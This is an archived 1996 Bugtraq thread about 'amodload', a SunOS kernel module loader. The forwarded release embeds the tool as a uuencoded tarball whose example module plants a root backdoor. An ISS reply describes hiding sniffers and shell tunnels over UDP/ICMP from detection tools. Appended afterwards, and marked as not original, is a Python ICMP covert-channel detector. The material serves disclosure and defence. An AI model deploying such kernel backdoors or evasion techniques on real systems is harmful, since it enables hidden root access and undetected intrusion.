Bugtraq mailing list archives
Re: BoS: amodload.tar.gz - dynamic SunOS modules
From: cklaus () iss net (Christopher Klaus)
Date: Thu, 20 Jun 1996 09:30:36 -0400
Dear best-of-security () suburbia net, I have been asked to test amodload. I understand Amodload will load modules of code into a SunOS kernel. I would like to know more about Amodload before I try it. Can you supply me with details on how it was designed and tested? What is the desired end result, and how can I best recover if something goes wrong?
BOS is probably not the place for a lot of debate, etc. Just a quick overview of amodload and what it means would still be useful to everyone on BOS. Maybe any debate should continue on bugtraq.

amodload is a quick 'hack' that demonstrates how trivial it is to load certain modules or patches into the kernel. The example in the amodload package puts a backdoor into the kernel, so that you can easily obtain root (superuser access) via a simple call. A more sophisticated hacker could/would replace this with something like a sniffer. The sniffer program would never show up in 'ps' or anything that looks at processes. And because the kernel can be modified, ifconfig and CERT's cpm program can be given false information so the machine cannot be detected in promiscuous mode. Fortunately for hackers, Sun has not given an easy way to detect a promiscuous Solaris box anyway.

And another quite possible replacement for amodload is a backdoor that tunnels a shell over a UDP/ICMP protocol. This provides an easy way back into a network and to directly access machines. This bypasses many packet-filter-based firewalls and cannot be detected by tripwire/cops/tiger or tcpwrappers. Only an admin carefully watching all the packets going across their network would find this type of backdoor.

An amodload-type backdoor can be made to survive a warm reboot as well. And because you are modifying the kernel, you can make it almost impossible to detect a modified kernel, because the kernel can change any information about itself. Nor has anyone released any type of tools to the public that would even attempt to detect such backdoors.

So for today, the best defense is really to take pro-active action and prevent intruders from gaining access to your network. This can be done with a combination of firewalls and having a continuous security assessment program in place where you scan your network for vulnerabilities and correct them. You can test your own machine with a scanner from www.iss.net.
Ben, please work with Sonia and Rick and look at capabilities. Thanks, Jack

______________________________ Forward Header __________________________________
Subject: BoS: amodload.tar.gz - dynamic SunOS modules
Author: Mark S. Roed at PNT2
Date: 5/28/96 10:22 AM

fyi:

______________________________ Forward Header __________________________________
Subject: BoS: amodload.tar.gz - dynamic SunOS modules
Author: best-of-security () suburbia net at smtp
Date: 5/26/96 12:45 AM

Avalon Security Research Tool Release (1) 05/16/96

This release serves two purposes: first, to let you know of important changes in the direction being taken by ASR, and secondly to release the first in our series of security tools. Whereas at first ASR was a completely not-for-profit venture, we have recently become involved in a commercial undertaking. This change will be transparent to our subscribers, as we will continue to release various bug reports and exploits to the security community.

Amodload will load modules of code into a SunOS kernel. What this amounts to is essentially a tool which would allow hackers to load arbitrary code into the kernel which would be invisible to any conventional means of detection. This code is offered up as a proof-of-concept tool. We are aware of these types of tools on the Internet and in active use. In order to counteract tools like this, we first must understand how they work. Amodload should provide some people with this insight. This being said, it should be noted that amodload itself can do no damage; the damage done by amodload and tools like it is from the programs they load into the kernel. Our example code which comes with amodload at the moment is as innocuous as possible.

ASR <mcpheea () cadvision com>

Note: If you wish to subscribe to the ASR mailing list, send mail to mcpheea () cadvision com with the word SUB and *only* the word SUB in the body. Email directed to ASR may also be sent to mcpheea () cadvision com.
If you wish to correspond with ASR please make use of the PGP key given below. -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.2 mQBtAy1GTuMAAAEDAM2X2UnGZkuzT5kL8BUfiDniW6rPZgymD8IqUVy7we6Eo7Gm H1iQBEjDoRoBBpm2nCmzOHsHVCs4ABJJH2ByoQ9mpXUZZRu0SbBVpDVQXR09qINs Yp2GhyWA3p0z6AAOzQAFEbQbQVNSIDxtY3BoZWVhQGNhZHZpc2lvbi5jb20+ =qYbo -----END PGP PUBLIC KEY BLOCK----- ------------------------------------------------------------------------------- The following is an attached File item from cc:Mail. It contains information that had to be encoded to ensure successful transmission through various mail systems. To decode the file use the UUDECODE program. --------------------------------- Cut Here --------------------------------- begin 644 amod.tar M'XL("/B4LRT``V%M;V0N=&%R`.T]:U?;2++[%?V*BN>2R&`;23:/"2'WDH3, ML)-`#C";NY>P'%F2;0VRY-$#0V;RWV]5=;<>ML%D$LC,KOLDMM5=757]JD=W MM7B[>[#_>N_XY&_WF`!@H],!^@8PY+<IOS%M;IH(86QN;!C&9GL3<];-]N;? MX#YY6B21M+=R`BPMG0S\!'I^X+4T[:U]X=%/RO5@*)^PX.#P9.]X:6EI-TL' M4?PD@3!*O02B$.QAY`:1[8(=NC"(QN"G@`B[GA_V-:QACT:![[F(XVAO]]7; MO26!._9L=TB85?V6J8B&,++[E2)'%"51%CL>\PJ]*,Y)(SM#VP_U>KG.0*'S M0Q@@,2^>KHCPWI4]'`5>@DT#UX\])XWB:W"B,,6*V`20`(!5,H3#*H%KA]X5 M,74\P5`<9:D?8K]DB>>"7W1.R]&T).O&5&E)S7^HP52J:=K8;!VW4@^)VBD. 
MQ&XRG&KXV%2D$-R:#VX5X'+\U4#?YQS#YG1N6__FNES_IKF^;FS0^N]8B_7_ M(.GEZS>[/QS##C3[\!TT7_WTC[>O]E[\_(-V^.+OQSL@IWA43.`(>/Y&Q0I[ M"O^E$W1=6W(<PM,,+BZ'*A.:7%F;S\HB?8/$\OR>:<S1_^:ZM2[6_SJ*`,,@ M<;'1;B_6_T.D'U%1YYI[',47R5--6]I5.?21L$;WKCPG(U7O1*Y'*BU%I7KA MQ:$70)<4Y7#D!Z0G"5@;QWY*#^D8Y<70#H)")>JHM`AF;-5;`+N]%!4RXDJ\ M`L2./=`$1E2?6'C-68C^`I_'?CJH4/=#&U6URO81G7>50I+:,?.@V2F#=[V^ M'[(JCWJE^F0T)/UNUD-NT%!`7<TLY9TRL!.@YJ18I%&UG#%JA>1)=DH:W48) M"7E)@B8-:$BNY\4-(",I]E!E.]AL@O3"%-M"RCIU1N=9$L?>K]3;V"]I,B[: M;KMNC,A`DQ1DWZ%5LH3]ZPMD/3].4E4$R%S7XQ&5O,LA=;'A^RDX.$J(+_3& MYQ=#;WB.CY&CUXEX%)/5A/4Y#\T+;,@P4GP.E$U4H=#23F872.9"U74\.OBA M6L1S0_8W]Z@FQUD!)"/L+:R#[>H/8,WU+M>(X7SX;IF[9"0Q6,D4@L1'F^E: MMI]:@_9>ZMN!_]%.?31L%9R<\[(5FFR:GB49UKR&\VZ$#=+K:'Q^ZT7]&4G8 MXO=+8Y[\;Y/\7U]?[VR:9L?HL/S?["SD_T,D=OJDN!!SH>(8@=DR0/\[NF); M#3"__WZCKG&-41SU8WL(XY)P1"VP>VD'N&*.<;EAYC4<H5BW8V<`SX;.:.!Y M]O\XMGOI)[BL6BA&X;FF:<>>!\H)%;11,J#80L'FATZ0T6(C#R51WJ=RRG!M M0S?VO1Y$EUY\Z7MCJC,>2'&/4N*"9*T;D49!-CW40OB=1$,4P,K=HRKLK*+< M15*Q4#[DJUZ3_)9($F3I@F2.3USLAZA;@H"E`VG+HTP(>W*3(1E$6>!"WPN] MF"0E=IT0/W87I45H#[$Y3W*'%:61Z%#E8JOZI(J%M+?#:SC.PL-CZ+3,UO\B MI#,@20_P5OS"-F![8U).2"S)PDX3/Z*D8UXI8-$J=-6Q>#2*XI3]</*+,=M/ MRB5*S.4,T8B$UV,&11TF/$G-+_6!TG)"$;.`I2DB^[\\15":>V[&&H0J():4 M9'M*.G68A31E$)?CQ32^T$4,;D0JQG,&H?]KY@EQ+AFFRB'/#F+(L4D.D\/] MEY*_WSH5NR[W1V.._X]"OR/L_T[;6&^;Y/]OK%L+^?\0J77R(^R^/7SUYG#W M%8Y);0M(V).DKVFMXQ_A8/?M7N[IPX<F+V6O;%7E#L$L,XUQ'/_SX/#=\?ZQ MUGJ1*Q;M%)J7<`9::_\(HNXOGI,V2=QPA5=[QR^/]M^=[!\>:*TW[XJM!EKZ M:*ZAHV&S/2JS=;,NQ!:*?C2HIPT_K40AN8E7808C!=?OD76.ICBI!@^5BR:% M8L]VTIP,*Q821+&'YE^4(Y6"M,5-.>168--/WE'S/S0OM5&,D@L0:S=":>IZ MW:S?)_7AARC(ABQ1E0SU:6<5D:-4ZV4!M9BT5X3&Z'@0:;1=:\O.8%4QF'+F MD(EWKYB1VO'>'NR^.3[$<7UQI'H.L.L:W,<$\^+G'X[Y(4<R]/N#E!O9]0;V M)0UV3'NCR-.8C.TX"R$+R3NP:7/UTL<"K.OW?)3+HC\6XOC/G(J-Z?NC,4?^ MKYL=2\C_=J>-DI^R-M>-A?Q_B/2=M+'A67*=K*77([2S!\^U:C9:^VF4C*<+ MT`9,IW.'0SN<`1LY%]X,:/Q/KO=$0>KZ436KYX3I!%1(CD(UZ^)R6,FH%>=` M-70V')+XYRB[_7[2@"S+&G)G!1\2.][66#3;W0A%\XZQK2$ZA%ZYL)-MC1KK 
M.^`,4-QV[;AW:AI6YRS/3]"!0.T@^PHN;/=C=KJ!Y1HCY8,I.^X[#;3%^Y=U MSJ3G;8TQKJQ0]K;VFX;SG\K\!L0V9N!C=HY>51]64(MU([=!^C+Q/YX2\5+I M.!IA&7XFDR4CS&O`BFO'`I_JA6[DCT0&<^#:R'REHMC^]YRQ7M_&;,5:WTNC MKEYOH(V?)G;H./0[H(,W;"W"4+.:S6UJT.HJ(QP/4/-R\Y\;\/BQ;"WL[,"3 MYI,Z0?P&D*`20U]17]%U+JZOFG4NHV(M/QI#2]^#)Y=/X*D:*=@QMXOR4NK& MGGU1*G*]GIT%*=9D)=S3:S^'%V$T1A=FQ-X<+"<?PAKV%=.?B;2"\Y/\KK:8 M.^H3=P7W*>R`'%W,P;F$SS2QHI$7Z@<_OWG3@/+GX?G1J_='8IJ<&F>""[\' M.M?<82C5+=Z5GZ(*%]W.,(B7EP5!-]#?O*K#HQTP5!^/O#B.8KV6P]7R5N:X M<N8)H>QB59]\+=W'I8&83_VS5GA.+BV1(+:VP5]=K1>]IGIY.7D*L#SBKJU4 M+#U>VD'FE:G3&L6>TN5LK1.DD4-NSP+1=5U,W;I.1?75=AT>@W'5$\F1?2GV M4B=0FU74*!LF(:P)"!08DR#M$@C!B)7"DZ`!CZOKMQC8<A^7>HTK__+$Q4DI M-WYY7]O_Z*F^E(BE/##/5K?D5*"%.3:18V:05W==7Q%PJ\95V\#UO+8"]`N< M+!F0%[^R5JK9N:5F"6RC`L9]7B[>FE7,Y2B10!TODGPQ&[).`]Z;YX>O7UM' M>R<-*:=Q*I>FN)C>LNEN=)'5:54TS7R*R^[CF?X4Q47(!FS/1X=`;-*2!R`7 M.J.Y90F0B"P/,M&;G(7$%,,]JB[.&4-;&MWWNT<'^P<_/$7FD,$L""#J]1(O MY24F^$1Q%%PQFX2^X#)(O&E\8SNF7:C/PJ>XUU'3T'"@")?]*G4&Z;GZA`21 M]'IV:@?`G8SCB$Y0FJ&YCY/59?`6TT&\LSL7_Q?]N[HCZ&T72X8(WV'%@%!* MG[5H!.KI-:/$)WNX0GS*7E!<R&4P.=]*(I7KWB92>9);$PMS8MU8$ZMOJKBZ MZHJY(8NW9A7/7'667'7X_=Z:O>I*75LZZ:%-O=))4C'X8GIQOQ'13]K"^_M3 MI\(\OC\:,&?_K[VQ(>-_C(U.NPT+_^_A$AH!+!NC'MBM*$M5B!QJ2+%9AE;! 
M=V@VTP'HCWN[KX[W_V\/S8:.08(A+RE4-E!AIRBP)@JPDG246(VS^4?BZC<A M3&OGXBR^!I\:H+*$O499*B?+0O^JG%$<EJM<4L3:)Q1!%7*LOBOT6#%B)885 M,E,:+SF8$J7&E2%2ARE0U![JUX$/R\L#_X-N7*&"04=H>3DR:CD/HAD$BQ8$ MEQ%$$-T(?SOJ8!:HP!Q8TY@#:P)\XL=$HZTO:/0LSB1C,YH\LQTW(#9O;K(Y M`_,D^(PF?^M5]^=)ZAQTK1_%O7O:!)PC_Z&SV5'G_Y;%YS\;F^;B_/]!$LK_ M]_)PEHX64A^=><^.@VLZ!\HHKNJ68WT-5FXXV7].1>H(PX8DS;IYS``%27F) M.*3/#QIDH5;6-S_M'1WLO=%NV*(L-O-DX(W8.E.9V)*)O2ZQM87>@!>'>78Y MU$D8R5B1]F>*?./*DDZO,'-UA,#G3_\64B1?__3#O!\!`//B?\QVOO[-=0NS M-@UC$?_](&G6^J<+!%]W^5,$:`,<BK!IB(-9.[DF0>!ZJ8?&F;I;$?6H(H?P MV&$>DR-/(3E*4H0$VD`&H#IPS1*Z8H(5D?]!Y":`=FS@A^+FQ2PI0R>]H0S1 M":@B'V';3BHB^<2E#7&V2R$_(D+0:[%PNJ-TFCA`L8GJK*./=$8VTH^G<^5I M*DL^*<2D:8NE=%8MOD[IQ$'NWU<$(V_<^_U^X"E))RM8YEDKN3X/[;@/*/F, M[>DR.J#!(E&]+`I-%H1:&;>@)EG+G!C[<F5HT[>@*GXC-B=VHM&UGK6R<\JI MEXN;SYWX///=G!\%A1D*6<&%\6\CCA\\3<K_5NH[%U_Y.M`<^0^FL2GC?ZP. MVX*F82W\_X=)XKZ<7+/B)%:WY(XENF.X!'5I_-".8:#7UKI^N)8,:@VH\>=B M[?VED[K#>)\TYOA_G75+QG]LK&]L&F3_K2/\8OT_1/K"^(\9,1TW!V5H:&SF MUI.\9\C^GM_#W#PKM[!<KTMG*G1#6+<;T$4+L@$NG?E\X!TJ=2ZA@&#Y*O_' MQQ"E2@V8A:JN31(3AS\5:M/$1`SD7&I3N(@<'][-(EI4F=4!.?N((73]GC8W M[*02KA+8?1&NTJB$KD@[LA3TDN<I!UELOA8V92DF9&R/&S#R4SHAZ_6P@>C5 MT['14`2W8'$>VT)0(K@&(;>+,!RL40JR&<KP%ZXTCH:GEG&VK6S7V*\&PTR' MNRBL(I*G!(J=NCTSH`%*QZ?RQAIY)\5EMO&R"^I.-0\R-DI9S[(F\HFZ$`%; MQWDYT0[I?A.52F4Z#9[?UJX5!YLZ-A-MW#RPAL&I]^:?PC[-:U$82_E`ECBO MAK(0E<<H@_\;M;CGUN`IU!R'SFLQ__ESV)HZP2R%M$RW)"HWO-0*.D]F*#$S MC"\Z2?;GG"1/L55F2APJ<]'C8N(404U?$H11&YLU.1'E:3),)T6E+--PPA?A M9[QP&XPXZNG555U?Z=QRYDRX;CMRGHQ3T86,L,Y:HU@>F@CP+OMCC\5@/9Z& M:D"G&.*IAHAJXG"=.\,X6S6M/\AWE8@ZD<^IE-:^05W^!0?RL\E\^:C,)2QT MI[[[^GS_@`[=CP]?_G1^?'*TM_M66-7%Q)$#0P-YYX%YL,9,3O1Y$P15T?U/ MD.HT_*()@N6T>I0NJ>O4`E@E15;9%4:XOZ`K)%Y&<K\TX';[?]-L=]3[/ZR. 
MP?'?9MM<V/\/D>YD_]\YS/OSHK9GFI]L))+AT+=1Q/^:V1<-0(NW+BU)S"W, M1RI5)B;"E*U'E)C*R%59J=VM&)1A81.B+`P\)EF'9]"&WW]78664=UHJ;IIG M9)0\B9X0T&2A)0I;3^I*U-P>`[AW='1X]!3VP8UXMYFOTF!OAV1N-!`N\"C8 M.1EYCM^[!AM:$8=EL-U!%&\/"91FX5=`/U-M@AZB9.Q%,=UZGRUAJ?`6$8Y] M%SJHVG"TF&"#MOZD+J,1E'V+/[EO99"QHL_30F!&0,*#.0VJ6(X652R-;23^ M.,R9(=Y#-G95CA3D89E!V94X=]#06PZN:F)."I!9IB/%2,M*N!RP&[`>[YFA M9=N,R(ILOI"N6?.$'W=A[7+(YQG-`VAZ*D95!*A6;4GN)^8E'YU/DWMS`1F^ M-?'9),N<*]445<X^J4DTM>8N94@&RN1JS0,&]>A31LF4R$ZU\;4M7M81,3-H MQS]Z]`@;H/8.Y<"KLP(VQ^D%'0T0(9:_9&%JJT5.!87KR(&A2OTR7.F61,]6 M![OJ,`1;"4EH?_Q8"F]E*!QOCK@79"G*_O#@S3]OF+D$-&?Z]XB40(U6&9.\ M:140Y&TVQHJ,S$21.M*-AN"_E:3G9*LUX-W1X<DYW<YOP-O==^?OCO;_L7NR MUP!)VRB,/XFH"/^<9H9HS+&J;G"%J*9PA/@0;GD$N#B?*C=(=*N,F*TTH%@L M8OA65^E"A%XRJ03;JVC&UF%UPGV:";AU5T`T,`7Y.Y"^$]Q6!0[@)KB"L,C8 M@;:5S__<O:<?URA2[+A>BL.ZSB?_K[23\1O/$29P@1^T9.*+7(VE_A69]MT\ MP[%QO0_LM'2SY](./^+8(,=B4>"/4HCP4,0Y2&'+#$C>I5A%<!$H?$T>,SZ) M`.5<&!-7A$_<O""FZZMF<>\']&:30<K./[%T(P^(X91JK%BH;Q%7X0XI@2Q: M5($K/Y[E%2H@2)`JEE;>#-:%?*-[+M3/.^8V?3W;(4C^*6^XW*4-!"[;8-W4 MAEJR]J\/'QZ-[&39;:VL+2=K-3'"HCT%BG*+1&ZE/942T5:2WL7*IE)N$LJ$ M%6O5K`PA%1I<A_:#BHT<G%U?IN()"R*YQ1XJ[031P7N!2PS#[:.0I^*J$0FH MVD3GE1_/R@14M5Q5Y3,#E,F`:RLOPM\4'(2?9<-!7,[JEAB2I@0!/GL&6_`[ MY.ZR,M5D9^BX7)5FDM)@IFJJ=+I<BP6]<K=#<2V-"5`TA23`"_GP_"7JDI/? 
M#\_?'Q$95"`;AG$SL9J#CKAXFY<WQ"ZDJ!"R$FMW8,#-1I;.`JF8_IR'3#7` M+$T;S[E4AXN>*X8O+YTR-E[R.U+(I&5C`VN4QT_QG6.[;>.B9,WB-/U">W;^ M9"]-.7I9HJ/N(>'(Y&B_VK2;,>7*EB+O^(I]WUK3$4R(2XA37<G50-6ZN0,6 M`1E_L40OF;UO&D"[.\;-\7]6IXT0IF&V#6.38D%HNVCQ_L<'2:U^$'7M0#J= MFKPGR+8?O>YC.4'1W?Q^HT&_EI8>B9`R+A:Q^@-?-Z[6MRCR/N([(1R8SY<< M@FBBB*/(SJLO&,QQHLEL7#D,%L18PURJ%IG&)-7>EF%8!FHNHE70YFL03+L" M8`E[5O!VBA56Z3[*V0019Y*(:6S1Y0=/X*@`6[-HW@;?F41NF.)J!0.WJ\!; MDE^!_)2:"!/<6DX!TU8PZ,E,PK4-(9J3-(J]B6YM=_(N#S8FRYB'+I1NUTP` M,`-AA#.C6M`QM*FLSG36EO:(0L.@>TTO9TPC.@;4S0V@EXN1,^]'85)?J)'[ M3)67C-\3#9AS_\_:[.3W__@N(&RT%_'?#Y/^F/PG;]5<<N-HQ,?AJZZ=VN), M7.P,H;PG$"M_Q7WQAOO:U]`$A+R]1*^`'>?O\(IZH"[W$PLH"LF'ET'>%-/- MM3I29$<A!%BYZZ?)0C$L%,-_;**_&G'?-.;:_QS_*>U_4]K_B_<_/DCZ*O;_ ME"4N9)\QTQ"?MN,=;]W;<D6I68A.,Z\^!<#Z`W]/:H;.#6+'W)H4\E+T?*:8 MQ\+/%/1*[7V.O)^N,%/F0SG=3?S/!+]_+8"?=](#?$STK5?$?U:J_-6@>Z(Q MU_ZW2O;_^J:P_Q?[/P^2OMC^5^9W\9:IW`"O^`#EOW%5DP:\JHO@+-'[D7@[ C+TEY9:S/JKW0``L-L$B+M$B+M$B+M$A_./T_+/;S/`!X```` end
--
Christopher William Klaus
Internet Security Systems, Inc.
Ste. 115, 5871 Glenridge Dr, Atlanta, GA 30328
Voice: (404)252-7270. Fax: (404)252-2427
Web: http://iss.net/ Email: cklaus () iss net
"Internet Scanner finds your network security holes before the hackers do."
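The reply above says a backdoor that tunnels a shell over ICMP or UDP would only be found by an admin carefully watching the packets crossing the network. As an added example (not code from the original post or from the amodload package), the following Python shows one way to do that watching for the ICMP case: echo traffic is summarised per host pair, and pairs whose payloads have high entropy, vary in size, or do not carry the filler pattern ordinary ping sends are flagged. The record format, the addresses, the payloads and the thresholds are assumptions constructed for the demonstration.

```python
"""Heuristic screening of ICMP echo traffic for a shell-over-ICMP covert channel.

Added example; not code from the original post or the amodload package. It assumes the
packets were already captured and reduced to (src, dst, icmp_type, payload) records, for
instance from a pcap. Addresses, payloads and thresholds are constructed for the demo.
"""
import math
import random
from collections import defaultdict
from dataclasses import dataclass

ICMP_ECHO_REPLY = 0
ICMP_ECHO_REQUEST = 8


@dataclass(frozen=True)
class IcmpRecord:
    src: str
    dst: str
    icmp_type: int
    payload: bytes


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: low for ping filler, close to 8 for encrypted or compressed data."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def looks_like_ping_filler(payload: bytes) -> bool:
    """True if the bytes after the 8-byte timestamp form the incrementing ramp classic ping uses."""
    body = payload[8:]
    if len(body) < 2:
        return True  # too short to judge; treat as benign
    return all((body[i + 1] - body[i]) % 256 == 1 for i in range(len(body) - 1))


def score_pairs(records):
    """Summarise echo traffic per (src, dst): volume, mean payload entropy, size spread, non-filler count."""
    pairs = defaultdict(list)
    for r in records:
        if r.icmp_type in (ICMP_ECHO_REQUEST, ICMP_ECHO_REPLY):
            pairs[(r.src, r.dst)].append(r)
    summary = {}
    for pair, pkts in pairs.items():
        entropies = [shannon_entropy(p.payload) for p in pkts]
        summary[pair] = {
            "packets": len(pkts),
            "mean_entropy": sum(entropies) / len(entropies),
            "distinct_sizes": len({len(p.payload) for p in pkts}),
            "non_filler": sum(1 for p in pkts if not looks_like_ping_filler(p.payload)),
        }
    return summary


def flag_suspicious(records, entropy_threshold=6.0, min_packets=5):
    """Return sorted (src, dst) pairs whose echo traffic does not look like ordinary ping."""
    flagged = []
    for pair, s in score_pairs(records).items():
        if s["packets"] < min_packets:
            continue  # a handful of pings is not worth an alert
        high_entropy = s["mean_entropy"] > entropy_threshold
        shaped_like_data = s["non_filler"] == s["packets"] and s["distinct_sizes"] >= 3
        if high_entropy or shaped_like_data:
            flagged.append(pair)
    return sorted(flagged)


def build_sample_traffic():
    """Constructed traffic: ordinary pings between two hosts, plus random-looking echo traffic from a third."""
    records = []
    timestamp = b"\x00" * 8
    filler = bytes(range(8, 56))  # BSD ping pads the echo with bytes 0x08..0x37
    for _ in range(6):
        records.append(IcmpRecord("10.0.0.5", "10.0.0.1", ICMP_ECHO_REQUEST, timestamp + filler))
        records.append(IcmpRecord("10.0.0.1", "10.0.0.5", ICMP_ECHO_REPLY, timestamp + filler))
    rng = random.Random(1996)  # deterministic stand-in for an encrypted tunnel's payloads
    for i in range(8):
        size = (128, 256, 512, 1024)[i % 4]
        req = bytes(rng.getrandbits(8) for _ in range(size))
        rep = bytes(rng.getrandbits(8) for _ in range(size))
        records.append(IcmpRecord("10.0.0.9", "192.0.2.10", ICMP_ECHO_REQUEST, req))
        records.append(IcmpRecord("192.0.2.10", "10.0.0.9", ICMP_ECHO_REPLY, rep))
    return records


if __name__ == "__main__":
    for pair, stats in score_pairs(build_sample_traffic()).items():
        print(pair, stats)
    print("suspicious:", flag_suspicious(build_sample_traffic()))
```

Running the block prints the per-pair summary and the two flagged directions of the constructed tunnel traffic, while the plain pings stay quiet. The check runs on captured traffic rather than on the host for the reason the reply gives: a modified kernel can falsify anything a host-side tool asks it. In practice the records would be produced from a pcap and the thresholds tuned against a baseline of the site's own ping traffic.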